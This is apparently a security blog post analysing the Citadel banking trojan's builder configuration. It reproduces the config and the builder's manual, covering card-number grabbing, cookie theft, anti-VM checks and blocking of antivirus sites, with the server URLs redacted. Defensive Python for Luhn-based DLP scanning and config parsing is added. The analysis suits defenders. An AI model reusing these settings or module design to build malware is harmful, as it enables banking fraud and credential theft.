Tuesday, 18 September 2012

Citadel Builder trojan config file

This document presents the config file used by the Citadel trojan, successor of the well-known Zeus banking trojan. The builder uses it to create the malicious binary that infects users and communicates with the server hosting the criminal infrastructure.

Among the new features of this version, the modular configuration stands out: options are available depending on which modules have been purchased on the black market.

One of these modules is "CardSwipe", whose purpose is to capture confidential credit card data in order to operate with it fraudulently.

In this config file the criminals have this option switched on:

  enable_luhn10_get 1
  enable_luhn10_post 1

It was possible to reproduce the injection the trojan performs on the infected machine and capture the screen shown during the user's browsing session: when the user accesses Internet banking, a form asks for all of the confidential data of the credit card.

Note how the trojan requests the secret PIN (ATM PIN) and the Social Insurance / Social Security number (SSN), data that a bank never requests from the customer under any circumstance.
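To make the CardSwipe setting concrete from the defender's side, here is an added Python example (not code from the post or from the Citadel builder). It does what a DLP rule or a proxy-log review does: scan a submitted form body for Luhn-valid card numbers and report them masked, so an analyst can judge which fields of a captured request a LUHN10-based filter would have matched. The request body is constructed for the example; the field names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Candidate: 13 to 19 digits, optionally separated by spaces or dashes,
# and not embedded in a longer run of digits.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_valid(digits: str) -> bool:
    """Return True if the digit string passes the Luhn (mod 10) checksum."""
    total = 0
    for pos, ch in enumerate(reversed(digits)):
        d = int(ch)
        if pos % 2 == 1:                 # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(digits: str) -> str:
    """Keep the first six and last four digits, as a DLP report would."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def find_pans(text: str) -> list[str]:
    """Return masked, Luhn-valid card numbers found in free text."""
    found = []
    for m in CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_valid(digits):
            found.append(mask_pan(digits))
    return found


def scan_form_body(body: str) -> dict[str, list[str]]:
    """Map each form field carrying a Luhn-valid number to its masked hits."""
    flagged = {}
    for field, value in parse_qsl(body, keep_blank_values=True):
        hits = find_pans(value)
        if hits:
            flagged[field] = hits
    return flagged


# Constructed sample: a POST body of the kind the injected form would submit.
# 'ref' carries a 16-digit number that fails the checksum, so it is not reported.
SAMPLE_BODY = ("user=alice&cardnumber=4111-1111-1111-1111&expiry=12%2F14"
               "&cvv=123&atmpin=9876&ssn=123-45-6789&ref=4111111111111112")

if __name__ == "__main__":
    for field, hits in scan_form_body(SAMPLE_BODY).items():
        print(f"{field}: {hits}")
```

Only the card-number field is reported: the PIN and SSN values are too short for the checksum filter, which is consistent with the post's observation that those are collected through the injected form rather than by parsing ordinary traffic.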

Other configuration parameters allow video footage to be captured from the infected computer:

use_module_video 0
entry "Video"
    quality 1
    length 500

This is very useful for criminals: they can capture the on-screen sequence in real time while the user enters the secret transfer-authorization codes, bypassing authentication systems based on virtual keyboards.

Other commands also let Citadel capture data sent through the Chrome browser, enable protection against virtual machines so that the malware binary cannot be analysed in a sandbox, disable the sending of cookies, and block access to the websites of antivirus and malware-protection companies, redirecting the user's browser to the Google homepage every time they try to reach them. This is not done by changing the hosts file on the infected computer but by controlling the computer's DNS cache.

It also blocks access to the web pages of law enforcement and police cybercrime units.

The following lines show the Citadel Builder configuration.

;; Default config + updated AV's list (redirect to
;; Citadel Builder
;; SHORT MANUAL BELOW ------------>
;; url_config1 is required!!! url_config2 & url_config3 are optional, you can setup it like a reserve config host.
;; report_software - report to gate about installed firewall,antivirus,software: 1 is enabled
;; disable_antivirus 0/1 - if you bought the MiniAV module, you can switch it off. 0 is enabled.
;; enable_luhn10_get 1/0 - if you bought the CardSwipe module, you can switch it on a GET parsing by LUHN10 algorithm.
;; enable_luhn10_post 1/0 - if you bought the CardSwipe module, you can switch it on a POST parsing by LUHN10 algorithm(
;; use_module_video 1/0 - Do you really want to use video grabber? If no, please switch it off. 1 is enabled.
;; disable_httpgrabber 1/0 - Do you want to switch off Chrome HTTP:// logs grabber? 1 is enabled.
;; package_max_size 50 - logs reports transmission size(KB), stay it as default.
;; timer_autoupdate 10 - Auto-update of exe file, specify time in hours. This option takes exe link from "url_loader" section.
;; antiemulation_enable 0/1 - if you enable it, you can't test it on virtual machines such as VMWare/Virtualbox.
;; disable_cookies 0/1 - if you setup 0, then cookies will send to your gate and .sol files will be deleted.
;; For other information please open the "Personal Manual"
;; <------------------ END OF SHORT MANUAL.

entry "StaticConfig"
  botnet "main"
  timer_config 15 20
  timer_logs  7 20
  timer_stats 10 20
  timer_modules 7 10
  timer_autoupdate 8
  url_config1 "http : //"

  remove_certs 1
;  disable_tcpserver 0
  disable_cookies 0
  disable_httpgrabber 1
  report_software 1
  disable_antivirus 0
  enable_luhn10_get 1
  enable_luhn10_post 1
  antiemulation_enable 0
  encryption_key "*******************************"
  use_module_video 0

entry "DynamicConfig"
  url_loader "http : //"
  url_server "http : //"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
    "http : //"
  entry "WebFilters"
    "!http : //*"
  entry "WebDataFilters"
    ;"http : //*" "passw;login"
  entry "WebFakes"
    ;"http : //" "http : //" "GP" "" ""
  entry "DnsFilters"
  entry "CmdList"
    "net view"
  entry "Keylogger"
    processes "calc___.exe"
    time 1
  entry "Video"
    quality 1
    length 500
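To turn an extracted configuration like the one above into something actionable, here is an added Python helper (not part of the post and not the builder's own code). It parses the text format shown, lists which switches are in their armed state according to the builder's short manual, and pulls out the server addresses a defender would block or hunt for. The embedded sample is the post's configuration with consistent two-space indentation and the same redacted "http : //" placeholders; because the excerpt shows no block terminators, nesting is inferred from indentation, which is an assumption of this parser.

```python
import shlex

# Switches that, at the listed value, mean a capability is on.
# The meanings follow the builder's short manual quoted in the post.
ARMED_WHEN = {
    "enable_luhn10_get":    ("1", "CardSwipe: LUHN10 parsing of GET requests"),
    "enable_luhn10_post":   ("1", "CardSwipe: LUHN10 parsing of POST requests"),
    "use_module_video":     ("1", "video grabber enabled"),
    "antiemulation_enable": ("1", "anti-VM check: will not run under VMware/VirtualBox"),
    "disable_cookies":      ("0", "cookies and .sol files are sent to the gate"),
    "disable_antivirus":    ("0", "MiniAV module enabled"),
    "report_software":      ("1", "installed firewall/antivirus/software reported to the gate"),
}
URL_KEYS = ("url_config1", "url_config2", "url_config3", "url_loader", "url_server")

# Constructed sample: the post's config, re-indented consistently.
SAMPLE_CONFIG = """\
;; comment lines start with ';'
entry "StaticConfig"
  botnet "main"
  timer_config 15 20
  timer_logs 7 20
  timer_autoupdate 8
  url_config1 "http : //"
;  disable_tcpserver 0
  disable_cookies 0
  disable_httpgrabber 1
  report_software 1
  disable_antivirus 0
  enable_luhn10_get 1
  enable_luhn10_post 1
  antiemulation_enable 0
  encryption_key "*******************************"
  use_module_video 0

entry "DynamicConfig"
  url_loader "http : //"
  url_server "http : //"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
    "http : //"
  entry "WebFilters"
    "!http : //*"
  entry "DnsFilters"
  entry "CmdList"
    "net view"
  entry "Keylogger"
    processes "calc___.exe"
    time 1
  entry "Video"
    quality 1
    length 500
"""


def parse_config(text):
    """Parse the builder's text format into nested dicts.

    Assumption: an 'entry' block extends over every following line indented
    deeper than the 'entry' line itself.  'key v1 v2' becomes key -> [v1, v2];
    a bare quoted string becomes an item of the block's '_items' list.
    """
    root = {}
    stack = [(-1, root)]                 # (indent, node) for each open block
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith(";"):
            continue                     # blank line or comment
        indent = len(raw) - len(raw.lstrip())
        while stack[-1][0] >= indent:    # close blocks at this level or deeper
            stack.pop()
        node = stack[-1][1]
        tokens = shlex.split(raw)        # honours the double-quoted values
        if tokens[0] == "entry" and len(tokens) == 2:
            child = {}
            node[tokens[1]] = child
            stack.append((indent, child))
        elif len(tokens) == 1:
            node.setdefault("_items", []).append(tokens[0])
        else:
            node[tokens[0]] = tokens[1:]
    return root


def armed_features(tree):
    """List (key, value, meaning) for every StaticConfig switch in its armed state."""
    static = tree.get("StaticConfig", {})
    return [(k, static[k][0], meaning)
            for k, (armed, meaning) in ARMED_WHEN.items()
            if k in static and static[k][0] == armed]


def network_indicators(tree):
    """Collect (where, value) for every server address the bot would contact."""
    hits = []
    for section in ("StaticConfig", "DynamicConfig"):
        block = tree.get(section, {})
        hits += [(f"{section}.{k}", block[k][0]) for k in URL_KEYS if k in block]
    dyn = tree.get("DynamicConfig", {})
    hits += [("DynamicConfig.AdvancedConfigs", u)
             for u in dyn.get("AdvancedConfigs", {}).get("_items", [])]
    return hits


if __name__ == "__main__":
    tree = parse_config(SAMPLE_CONFIG)
    for key, value, meaning in armed_features(tree):
        print(f"{key}={value}: {meaning}")
    for where, value in network_indicators(tree):
        print(f"{where}: {value}")
```

On the post's configuration this reports the two CardSwipe switches, cookie exfiltration, MiniAV and software reporting as armed, while the video grabber and the anti-VM check are off, which is why the binary could be examined in a virtual machine. The URL list is empty of real hosts here because the post redacted them; on an unredacted config it is the block list.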
